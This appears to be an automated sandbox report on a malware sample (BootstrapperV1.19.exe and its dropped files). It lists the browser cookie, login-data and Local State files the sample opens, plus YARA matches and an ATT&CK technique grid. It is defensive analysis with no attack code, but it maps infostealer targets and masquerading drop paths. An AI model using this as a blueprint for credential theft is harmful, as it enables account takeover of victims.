                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: PerfNET.exe PID: 6520, type: MEMORYSTR
                                    Source: Yara matchFile source: BootstrapperV1.19.exe, type: SAMPLE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.506570b.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.506570b.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.4f5070b.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.BootstrapperV1.19.exe.32b771a.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 13.0.PerfNET.exe.e00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.54ab86.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000000D.00000000.1994292109.0000000000E02000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000003.00000003.1697999893.0000000004F02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000003.00000003.1698866320.0000000005017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\ELAMBKUP\SIHClient.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, type: DROPPED
                                    Source: Yara matchFile source: BootstrapperV1.19.exe, type: SAMPLE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.506570b.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.4f5070b.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.BootstrapperV1.19.exe.32b771a.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 13.0.PerfNET.exe.e00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.54ab86.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\ELAMBKUP\SIHClient.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts11
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    DLL Side-Loading
                                    11
                                    Disable or Modify Tools
                                    1
                                    OS Credential Dumping
                                    1
                                    System Time Discovery
                                    Remote Services11
                                    Archive Collected Data
                                    1
                                    Web Service
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Exploitation for Client Execution
                                    1
                                    DLL Side-Loading
                                    11
                                    Process Injection
                                    11
                                    Deobfuscate/Decode Files or Information
                                    LSASS Memory3
                                    File and Directory Discovery
                                    Remote Desktop Protocol1
                                    Data from Local System
                                    1
                                    Ingress Tool Transfer
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts3
                                    Command and Scripting Interpreter
                                    1
                                    Scheduled Task/Job
                                    1
                                    Scheduled Task/Job
                                    2
                                    Obfuscated Files or Information
                                    Security Account Manager137
                                    System Information Discovery
                                    SMB/Windows Admin Shares1
                                    Clipboard Data
                                    11
                                    Encrypted Channel
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Scheduled Task/Job
                                    Login HookLogin Hook21
                                    Software Packing
                                    NTDS1
                                    Query Registry
                                    Distributed Component Object ModelInput Capture3
                                    Non-Application Layer Protocol
                                    Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading
                                    LSA Secrets231
                                    Security Software Discovery
                                    SSHKeylogging14
                                    Application Layer Protocol
                                    Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts32
                                    Masquerading
                                    Cached Domain Credentials1
                                    Process Discovery
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                                    Virtualization/Sandbox Evasion
                                    DCSync141
                                    Virtualization/Sandbox Evasion
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                    Process Injection
                                    Proc Filesystem1
                                    Application Window Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
